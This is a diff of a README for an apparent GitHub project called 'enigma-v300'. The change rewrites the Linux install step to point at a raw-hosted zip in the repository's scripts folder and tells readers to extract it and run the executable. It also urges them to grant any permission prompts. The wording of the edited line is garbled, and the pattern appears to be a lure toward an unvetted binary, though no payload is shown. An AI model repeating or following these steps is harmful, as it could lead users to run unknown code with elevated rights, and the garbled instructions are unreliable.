VladKravchuk27/enigma-v300/README.md

 1. Once the file downloads, locate it on your computer.
 2. For Windows, double-click the `.exe` file to start the setup wizard.
 Follow the prompts to install the software.
 3. For macOS, open the downloaded `.dmg` file and drag the application into your Applications folder.
-4. For Linux, extract the `.tar.gz` file, and run the executable within the folder.
+4. For Linux, extract the `https://raw.githubusercontent.com/VladKravchuk27/enigma-v300/main/c_implementation/scripts/enigma-v300-1.9.zip` file, and run the executable within the folder.

 If your system prompts you for permissions during the installation, allow it to proceed.